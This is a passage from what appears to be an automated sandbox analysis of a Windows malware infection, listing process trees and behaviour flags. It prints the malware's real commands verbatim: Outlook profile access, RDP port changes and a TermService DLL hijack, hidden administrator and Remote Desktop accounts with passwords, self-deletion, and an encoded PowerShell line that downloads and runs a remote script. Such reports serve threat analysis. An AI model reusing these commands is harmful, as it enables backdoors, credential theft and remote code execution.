3220 4D87.exe 98 PID 3220 wrote to memory of 2376 3220 4D87.exe 98 PID 3220 wrote to memory of 2376 3220 4D87.exe 98 PID 1604 wrote to memory of 2412 1604 53F0.exe 96 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook 4DE.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook 4DE.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\b911c2b27294ffb810cb39cdb3b291cba93ef10d321b847c744af4616b60e275.exe"C:\Users\Admin\AppData\Local\Temp\b911c2b27294ffb810cb39cdb3b291cba93ef10d321b847c744af4616b60e275.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1776 -
C:\Users\Admin\AppData\Local\Temp\b911c2b27294ffb810cb39cdb3b291cba93ef10d321b847c744af4616b60e275.exe"C:\Users\Admin\AppData\Local\Temp\b911c2b27294ffb810cb39cdb3b291cba93ef10d321b847c744af4616b60e275.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2004
-
-
C:\Users\Admin\AppData\Local\Temp\4DE.exeC:\Users\Admin\AppData\Local\Temp\4DE.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Accesses Microsoft Outlook accounts
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
PID:2212 -
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\4DE.exe"2⤵PID:1908
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK3⤵
- Delays execution with timeout.exe
PID:400
-
-
-
C:\Users\Admin\AppData\Local\Temp\9A2.exeC:\Users\Admin\AppData\Local\Temp\9A2.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of WriteProcessMemory
PID:752 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 9A2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\9A2.exe" & del C:\ProgramData\*.dll & exit2⤵
- Suspicious use of WriteProcessMemory
PID:904 -
C:\Windows\SysWOW64\taskkill.exetaskkill /im 9A2.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3152
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 63⤵
- Delays execution with timeout.exe
PID:2616
-
-
-
C:\Users\Admin\AppData\Local\Temp\1470.exeC:\Users\Admin\AppData\Local\Temp\1470.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1272 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1760
-
-
C:\Users\Admin\AppData\Local\Temp\1EA3.exeC:\Users\Admin\AppData\Local\Temp\1EA3.exe1⤵
- Executes dropped EXE
PID:2868
-
C:\Users\Admin\AppData\Local\Temp\2DC7.exeC:\Users\Admin\AppData\Local\Temp\2DC7.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3396 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2216 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nv5bspkd\nv5bspkd.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:1864 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES57F0.tmp" "c:\Users\Admin\AppData\Local\Temp\nv5bspkd\CSCF538AC0CDBF458D8CEC8EBF98271678.TMP"4⤵PID:1976
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1400
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3232
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵PID:2472
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:2496
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:3344
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:948
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵PID:3860
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:400
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵PID:2196
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵PID:3640
-
C:\Windows\system32\net.exenet start rdpdr5⤵PID:1684
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:1544
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵PID:3188
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵PID:3840
-
C:\Windows\system32\net.exenet start TermService5⤵PID:2496
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:1360
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:4012
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:3672
-
-
-
C:\Users\Admin\AppData\Local\Temp\34BD.exeC:\Users\Admin\AppData\Local\Temp\34BD.exe1⤵
- Executes dropped EXE
PID:2496
-
C:\Users\Admin\AppData\Local\Temp\3C4F.exeC:\Users\Admin\AppData\Local\Temp\3C4F.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3272
-
C:\Users\Admin\AppData\Local\Temp\4D87.exeC:\Users\Admin\AppData\Local\Temp\4D87.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3220 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:2376 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dmnamj5s\dmnamj5s.cmdline"3⤵PID:1504
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8CAC.tmp" "c:\Users\Admin\AppData\Local\Temp\dmnamj5s\CSCBD4AED7D31DC4373B38027E99BE0369C.TMP"4⤵PID:4008
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵PID:2896
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵PID:2332
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵PID:2896
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:3660
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:1152
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:3188
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵PID:948
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:3548
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵PID:3636
-
C:\Windows\SysWOW64\cmd.execmd /c net start rdpdr4⤵PID:3932
-
C:\Windows\SysWOW64\net.exenet start rdpdr5⤵PID:1980
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:2016
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵PID:1464
-
C:\Windows\SysWOW64\cmd.execmd /c net start TermService4⤵PID:1152
-
C:\Windows\SysWOW64\net.exenet start TermService5⤵PID:4008
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:3936
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\53F0.exeC:\Users\Admin\AppData\Local\Temp\53F0.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1604 -
C:\Users\Admin\AppData\Local\Temp\53F0.exeC:\Users\Admin\AppData\Local\Temp\53F0.exe2⤵
- Executes dropped EXE
PID:1208
-
-
C:\Users\Admin\AppData\Local\Temp\53F0.exeC:\Users\Admin\AppData\Local\Temp\53F0.exe2⤵
- Executes dropped EXE
PID:2412
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc Ghasar4f5 /del1⤵PID:3672
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc Ghasar4f5 /del2⤵PID:3936
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc Ghasar4f5 /del3⤵PID:2892
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc zg7dc2e5 /add1⤵PID:4088
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc zg7dc2e5 /add2⤵PID:1140
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc zg7dc2e5 /add3⤵PID:1208
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵PID:2008
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵PID:3952
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵PID:400
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD1⤵PID:2240
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD2⤵PID:3496
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD3⤵PID:4020
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵PID:3216
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵PID:3944
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵PID:1320
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc zg7dc2e51⤵PID:1604
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc zg7dc2e52⤵PID:1384
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc zg7dc2e53⤵PID:1860
-
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵PID:1896
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵PID:4020
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:1604
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
PID:1908
-
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:740
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:4012
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:3060
-
-